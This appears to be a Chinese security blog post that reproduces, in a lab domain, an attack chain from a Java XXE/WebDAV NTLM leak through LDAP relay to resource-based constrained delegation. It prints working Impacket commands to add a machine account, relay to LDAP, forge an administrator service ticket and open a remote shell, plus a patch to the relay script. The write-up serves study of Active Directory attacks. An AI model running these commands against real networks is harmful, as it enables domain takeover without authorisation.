XXE到域控复现

最新推荐文章于 2023-02-22 19:04:32 发布
最新推荐文章于 2023-02-22 19:04:32 发布
阅读量236 收藏 1
点赞数
分类专栏: 漏洞复现 内网蠕动 文章标签: 安全 https java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/118960766
版权

XXE到域控复现

前言

前面学习了基于资源的约束委派,也遇到了一些问题,就是域账户中继后无法成功修改委派属性,这里用服务账户权限测试一下

环境搭建

主机机器名ip用户密码版本
域控ad.test.com192.168.164.147administratorAa1234win2012r2
域内机器user.test.com192.168.164.129user1Uu1234.win2008r2
域内机器user2.test.com192.168.164.150user2未知win2008r2

在user2.test.com上搭建webdav
jdk-7u80-windows-x64
Tomcat5.0.28 https://archive.apache.org/dist/tomcat/tomcat-5/v5.0.28/bin/jakarta-tomcat-5.0.28.zip
psexec.exe
需要给模拟的vps修改绑定host,并且使用代理中继

psexec -i -s cmd

在这里插入图片描述

漏洞复现

首先通过域账户添加一个计算机账户

python3 addcomputer.py -method SAMR -dc-ip 192.168.164.147 -computer-name rbcd1 -computer-pass 123456 "test.com/user1:Uu1234."

在这里插入图片描述

开启中继

python3 ntlmrelayx.py -t ldap://ad.test.com:389 -debug --delegate-access --escalate-user rbcd1\$

发送数据包
因为javasun.net.www.protocol.http.HttpURLConnection类在响应401时,会根据响应判断使用哪种认证模式,这个时候我们可以返回要求使用ntlm认证,这样拿到目标机器的ntlm hash(参见Ghidra 从 XXE 到 RCE),继而通过中继其ntlm链接域控ldap添加基于资源的约束委派(我改我自己)。
在这里插入图片描述

获取票据

python3 getST.py -dc-ip 192.168.164.147 test/rbcd1\$:123456 -spn cifs/user2.test.com -impersonate administrator

加载票据使用

export KRB5CCNAME=administrator.ccache
python3 smbexec.py -no-pass -k user2.test.com

在这里插入图片描述

使用域用户尝试

可以看到这里使用机器账户权限时可以使用的,这里使用用户权限测试一下
首先删除修改的属性
在这里插入图片描述
使用用户权限启动tomcat
在这里插入图片描述
再次中继
在这里插入图片描述
可以看到并没有成功
我们手工修改,使用user2账户
在这里插入图片描述
尝试获取票据
在这里插入图片描述
失败了
查看rbcd1的sid
在这里插入图片描述
给user2机器配置属性

O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;s-1-5-21-1476105802-4187504772-1115168634-1112)

在这里插入图片描述
在这里插入图片描述
尝试获取票据
在这里插入图片描述
成功,这里确实和ateam文章说的一样,创建计算机的用户有权限来修改用户的msDS-AllowedToActOnBehalfOfOtherIdentity属性,但是在使用中继的时候存在一些问题。
其实可以发现,这里应该时中继脚本存在问题,通过定位ldap操作的未知,发现这里

        if self.config.delegateaccess and self.username[-1] == '$':
            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
            return

判断了用户是否为机器账户,如果是机器账户,则进入delegateAttack
这里我们可以修改self.username的值为要被设置的机器账户
在这里插入图片描述
重新中继即可
在这里插入图片描述
尝试一下另一台机器
在这里插入图片描述

self.username = 'USER1$'

在这里插入图片描述
可以看到用户无修改权限,所以直接报错

参考文章

https://y4er.com/post/xxe-to-dc-replay/
https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/#41-webdav-xxe

whojoe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
域内创建机器用户
谢公子的博客
09-13 2113
以下演示通过不同工具创建机器用户。
风炫安全Web安全学习第四十一节课 XXE漏洞演示与讲解
风炫的博客
01-07 222
风炫安全Web安全学习第四十一节课 XXE漏洞演示与讲解 XXE漏洞 0x01 基础知识 XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,…),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,…),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 <?xml version="1.0"?> <
Impacket工具使用
qq_18811919的博客
02-22 2996
Impacket工具包使用
Web安全攻防之常见漏洞及防御方式
读万卷书,行万里路。
01-27 395
1 SSRF SSRF漏洞的产生原因:服务器提供了从其他服务器获取数据的功能,并且没有对地址和协议进行过滤和限制。比如:2020年10月ByteCTF的easy_scrapy。 这种漏洞在CTF中也很常见,可以用来攻击内网中的应用,如:Redis、discuz7、fastcgi、memcache、webdav、struts、jboss、axis2等应用。 防御方式: 限制请求的端口只能是Web端口 限制不能访问内网的IP(IPTable) 屏蔽返回的内容 参考文章: 浅析SSRF原理及利用方式:htt
nopac 原理及复现
weixin_44747030的博客
10-04 4421
Nopac_ CVE-2021-42287/CVE-2021-42278复现
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
5、XXE漏洞pdf资料
最新发布
10-15
5、XXE漏洞
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
刚开始学XXE漏洞,可以看看这个博客.md
05-05
刚开始学XXE漏洞的时候,很懵,看见了这个博客,就转载一下,希望对刚接触这个东西的同学有帮助,刚学的时候浪费了很多时间,希望别人可以少浪费这个找资源的时间
Active Directory 域服务权限提升漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2739
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞复现七、修复方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授权下渗透攻击行为,切记! 一、漏洞描述 Active Directory 域权限提升漏洞 (CVE-2022-26923)允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
CVE-2019-1040 原理及复现
weixin_44747030的博客
10-07 1882
CVE-2019-1040漏洞复现
xxe进阶1.0
mingyqf的博客
04-27 174
前文:39:WEB漏洞-XXE&XML之利用检测绕过全解 xxe进阶 XML XML设计的宗旨是传输数据,而非显示数据 XXE=XML外部实体注入、XML=可扩展标记语言 Xml文件声明 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> DTD为XML的文档类型定义 引入外部DTD <!DOCTYPE 根元素 SYSTEM "filename"> 参数实体+外部实体 <?xml version="1.0" e
基于资源的约束委派(RBCD)学习
whojoe的博客
07-21 2883
基于资源的约束委派(RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章 原理 环境搭建 主机 机器名 ip 用户 密码 版本 域控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 域内机器 user2.test.com 192.168.164.150
EnPass+WebDAV(一个跨平台密码管理解决方案)
YiferHuang 的博客
02-10 3991
前言 相信很多人仍然处于“一个密码走天下”这一状态,但这种情况在当今互联网时代无异于裸奔。各种服务器漏洞造成的密码泄露,还有“撞库”等连锁反应,所以尽量保证各个软件产品使用不同的密码是有必要的。 但是带来的记忆成本是很大的,尤其是很多服务厂商对用户密码的设定有很苛刻的要求(出发点当然是好的),记忆起来十分头疼。目前市面上已经有了口碑质量都很不错的跨平台密码管理软件,但是费用都不低。 Enpass...
Web安全-SSRF
lanyef的专栏
10-21 1802
0x01 简介 SSRF(Server-Side Request Forgery),服务端请求伪造。 攻击利用了可访问Web服务器(A)的特定功能构造恶意payload;攻击者在访问A时,利用A的特定功能构造特殊payload,由A发起对内部网络中系统B(内网隔离,外部不可访问)的请求,从而获取敏感信息。此时A被作为中间人(跳板)进行利用。 SSRF漏洞原因,主要是由于服务端提供了从其他服务...
java xxe漏洞利用_关于JavaXXE 的利用限制探究
weixin_33572836的博客
03-09 543
一般而言,在Java里碰到XXE,如果是有回显的,那自然很好办,如果是没有回显,那就需要我们构造通道来把数据带出,过去在XXE利用中,如果单纯使用HTTP协议(除了作为结尾的CRLF外,不允许出现单独的CR或LF字符),是无法读取具有换行的文件的。比如常用作验证的win.ini文件就有换行如果想把该文件传送出去,将会报错 Illegal character in URL在rt.jar!\sun\n...
机器账户hash配合ptt拿shell(白银票据拿shell)
Shanfenglan's blog
07-15 333
文章目录命令 命令 需要目标服务的ntlmhash,域的sid,域名与你要伪造的用户的hash python ticketer.py -nthash 77bec211c5b72988b659dbbcf1052b2c -spn cifs/yukong -domain-sid S-1-5-21-3763276348-88739081-2848684050 -domain test.com administrator set KRB5CCNAME=administrator.ccache python wm
PentesterLab XXE
08-12
PentesterLab XXE是一个关于XML注入(XXE)的培训平台,它提供了关于XXE漏洞的理论知识和实际演练。XXE漏洞是一种安全漏洞,利用XML解析器对外部实体的处理不当,使攻击者能够读取本地文件、执行远程请求等。通过学习和实践,可以帮助开发人员和安全专家了解并防范XXE漏洞的风险。在PentesterLab XXE的课程中,可以学习到XXE漏洞的原理、漏洞代码编写、利用任意文件读取等技术,以及防御XXE漏洞的策略。对于防御XXE漏洞,可以采取禁用外部实体加载的方法,如在PHP中使用libxml_disable_entity_loader(true),在Java中使用setExpandEntityReferences(false),在Python中使用etree.XMLParser(resolve_entities=False)等。此外,对用户提交的XML数据进行过滤,过滤掉可能存在XXE漏洞的关键词,如<!DOCTYPE、<!ENTITY、SYSTEM、PUBLIC等。通过学习和实践,可以提高对XXE漏洞的识别能力和防御能力。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [XML 外部实体注入---XXE](https://blog.csdn.net/weixin_45677145/article/details/111638708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值